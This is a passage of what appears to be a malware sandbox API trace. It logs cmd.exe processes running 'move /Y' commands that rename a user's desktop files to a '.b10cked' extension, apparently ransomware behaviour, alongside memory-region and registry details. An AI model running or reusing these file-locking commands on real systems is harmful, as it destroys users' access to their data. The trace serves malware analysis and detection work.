10 [0232.137] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.137] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.137] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.137] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.137] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.137] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.137] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.137] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0232.137] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.137] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.137] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.137] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.139] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.139] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.139] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f09c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f094, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f094*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.140] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0232.140] _wcsicmp (_String1="TWV414~1.PPT", _String2=".") returned 70 [0232.140] _wcsicmp (_String1="TWV414~1.PPT", _String2="..") returned 70 [0232.140] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT" (normalized: "c:\\users\\eebsym5\\desktop\\twv414~1.ppt")) returned 0x20 [0232.141] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa1d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.141] SetErrorMode (uMode=0x0) returned 0x0 [0232.141] SetErrorMode (uMode=0x1) returned 0x0 [0232.141] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT", nBufferLength=0x104, lpBuffer=0x28ea24, lpFilePart=0x28ea0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT", lpFilePart=0x28ea0c*="TWV414~1.PPT") returned 0x25 [0232.141] SetErrorMode (uMode=0x0) returned 0x1 [0232.141] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.141] _wcsicmp (_String1="TWV414~1.PPT", _String2=".") returned 70 [0232.141] _wcsicmp (_String1="TWV414~1.PPT", _String2="..") returned 70 [0232.141] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT" (normalized: "c:\\users\\eebsym5\\desktop\\twv414~1.ppt")) returned 0x20 [0232.141] SetErrorMode (uMode=0x0) returned 0x0 [0232.141] SetErrorMode (uMode=0x1) returned 0x0 [0232.141] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT", nBufferLength=0x104, lpBuffer=0x28eea0, lpFilePart=0x28ec38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT", lpFilePart=0x28ec38*="TWV414~1.PPT") returned 0x25 [0232.141] SetErrorMode (uMode=0x0) returned 0x1 [0232.141] SetErrorMode (uMode=0x0) returned 0x0 [0232.141] SetErrorMode (uMode=0x1) returned 0x0 [0232.141] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked", nBufferLength=0x104, lpBuffer=0x28f0a8, lpFilePart=0x28ec38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked", lpFilePart=0x28ec38*="tWV414DCFHSA.ppt.b10cked") returned 0x31 [0232.141] SetErrorMode (uMode=0x0) returned 0x1 [0232.141] SetLastError (dwErrCode=0x0) [0232.141] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\twv414dcfhsa.ppt.b10cked")) returned 0xffffffff [0232.141] GetLastError () returned 0x2 [0232.142] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x28e5b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e5b4) returned 0x90ef8 [0232.142] FindNextFileW (in: hFindFile=0x90ef8, lpFindFileData=0x28e5b4 | out: lpFindFileData=0x28e5b4) returned 0 [0232.142] GetLastError () returned 0x12 [0232.142] FindClose (in: hFindFile=0x90ef8 | out: hFindFile=0x90ef8) returned 1 [0232.143] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT", fInfoLevelId=0x1, lpFindFileData=0xa1ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa1ae0) returned 0x90ef8 [0232.356] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked", nBufferLength=0x104, lpBuffer=0x28e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked", lpFilePart=0x0) returned 0x31 [0232.356] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt", nBufferLength=0x104, lpBuffer=0x28e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt", lpFilePart=0x0) returned 0x29 [0232.356] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt" (normalized: "c:\\users\\eebsym5\\desktop\\twv414dcfhsa.ppt")) returned 0x20 [0232.356] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt" (normalized: "c:\\users\\eebsym5\\desktop\\twv414dcfhsa.ppt"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\twv414dcfhsa.ppt.b10cked"), dwFlags=0x3) returned 1 [0232.369] FindClose (in: hFindFile=0x90ef8 | out: hFindFile=0x90ef8) returned 1 [0232.369] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28e800 | out: _Buffer=" 1") returned 9 [0232.369] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.369] GetFileType (hFile=0x7) returned 0x2 [0232.370] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.370] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28e78c | out: lpMode=0x28e78c) returned 1 [0232.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.370] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28e7c0 | out: lpConsoleScreenBufferInfo=0x28e7c0) returned 1 [0232.370] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.371] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28e800 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.371] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28e7e4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28e7e4*=0x1a) returned 1 [0232.371] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.371] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.371] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.371] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.372] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.372] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.372] SetConsoleInputExeNameW () returned 0x1 [0232.372] GetConsoleOutputCP () returned 0x1b5 [0232.372] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.372] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.372] exit (_Code=0) Process: id = "614" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16da0" os_pid = "0x9c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34415 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34416 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34417 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34418 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 34419 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34420 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34421 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34422 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34423 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 34424 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34651 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34652 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34653 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34654 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 34655 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 34656 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34657 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34658 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34659 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34660 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34661 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34662 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34663 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34664 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34739 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 34740 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34741 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34742 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34743 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 34744 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 34745 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 34746 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 34747 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 34748 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 854 os_tid = 0xeb0 [0231.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26faec | out: lpSystemTimeAsFileTime=0x26faec*(dwLowDateTime=0xbdc8dfc0, dwHighDateTime=0x1d440a9)) [0231.906] GetCurrentProcessId () returned 0x9c4 [0231.906] GetCurrentThreadId () returned 0xeb0 [0231.906] GetTickCount () returned 0x3fd03 [0231.907] QueryPerformanceCounter (in: lpPerformanceCount=0x26fae4 | out: lpPerformanceCount=0x26fae4*=28869575661) returned 1 [0231.907] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.907] __set_app_type (_Type=0x1) [0231.907] __p__fmode () returned 0x76b331f4 [0231.907] __p__commode () returned 0x76b331fc [0231.908] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.908] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.908] GetCurrentThreadId () returned 0xeb0 [0231.908] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xeb0) returned 0x38 [0231.908] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.908] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.908] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.922] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.922] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fa7c | out: phkResult=0x26fa7c*=0x0) returned 0x2 [0231.922] VirtualQuery (in: lpAddress=0x26fab3, lpBuffer=0x26fa4c, dwLength=0x1c | out: lpBuffer=0x26fa4c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fa4c, dwLength=0x1c | out: lpBuffer=0x26fa4c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fa4c, dwLength=0x1c | out: lpBuffer=0x26fa4c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fa4c, dwLength=0x1c | out: lpBuffer=0x26fa4c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.922] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fa4c, dwLength=0x1c | out: lpBuffer=0x26fa4c*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x40000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0231.922] GetConsoleOutputCP () returned 0x1b5 [0231.925] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.925] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.925] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.925] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.928] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.929] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.929] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.964] GetEnvironmentStringsW () returned 0x2c0178* [0231.965] FreeEnvironmentStringsW (penv=0x2c0178) returned 1 [0231.965] GetEnvironmentStringsW () returned 0x2c0178* [0231.965] FreeEnvironmentStringsW (penv=0x2c0178) returned 1 [0231.965] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e9ec | out: phkResult=0x26e9ec*=0x40) returned 0x0 [0231.965] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x0, lpData=0x26e9f8*=0xa0, lpcbData=0x26e9f0*=0x1000) returned 0x2 [0231.965] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x4, lpData=0x26e9f8*=0x1, lpcbData=0x26e9f0*=0x4) returned 0x0 [0231.965] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x0, lpData=0x26e9f8*=0x1, lpcbData=0x26e9f0*=0x1000) returned 0x2 [0231.965] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x4, lpData=0x26e9f8*=0x0, lpcbData=0x26e9f0*=0x4) returned 0x0 [0231.965] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x4, lpData=0x26e9f8*=0x40, lpcbData=0x26e9f0*=0x4) returned 0x0 [0231.965] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x4, lpData=0x26e9f8*=0x40, lpcbData=0x26e9f0*=0x4) returned 0x0 [0231.965] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x0, lpData=0x26e9f8*=0x40, lpcbData=0x26e9f0*=0x1000) returned 0x2 [0231.965] RegCloseKey (hKey=0x40) returned 0x0 [0231.966] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e9ec | out: phkResult=0x26e9ec*=0x40) returned 0x0 [0231.966] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x0, lpData=0x26e9f8*=0x40, lpcbData=0x26e9f0*=0x1000) returned 0x2 [0231.966] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x4, lpData=0x26e9f8*=0x1, lpcbData=0x26e9f0*=0x4) returned 0x0 [0231.966] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x0, lpData=0x26e9f8*=0x1, lpcbData=0x26e9f0*=0x1000) returned 0x2 [0231.966] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x4, lpData=0x26e9f8*=0x0, lpcbData=0x26e9f0*=0x4) returned 0x0 [0231.966] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x4, lpData=0x26e9f8*=0x9, lpcbData=0x26e9f0*=0x4) returned 0x0 [0231.966] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x4, lpData=0x26e9f8*=0x9, lpcbData=0x26e9f0*=0x4) returned 0x0 [0231.966] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e9f4, lpData=0x26e9f8, lpcbData=0x26e9f0*=0x1000 | out: lpType=0x26e9f4*=0x0, lpData=0x26e9f8*=0x9, lpcbData=0x26e9f0*=0x1000) returned 0x2 [0231.966] RegCloseKey (hKey=0x40) returned 0x0 [0231.966] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.966] srand (_Seed=0x5b8863bf) [0231.966] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked\"" [0231.966] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C 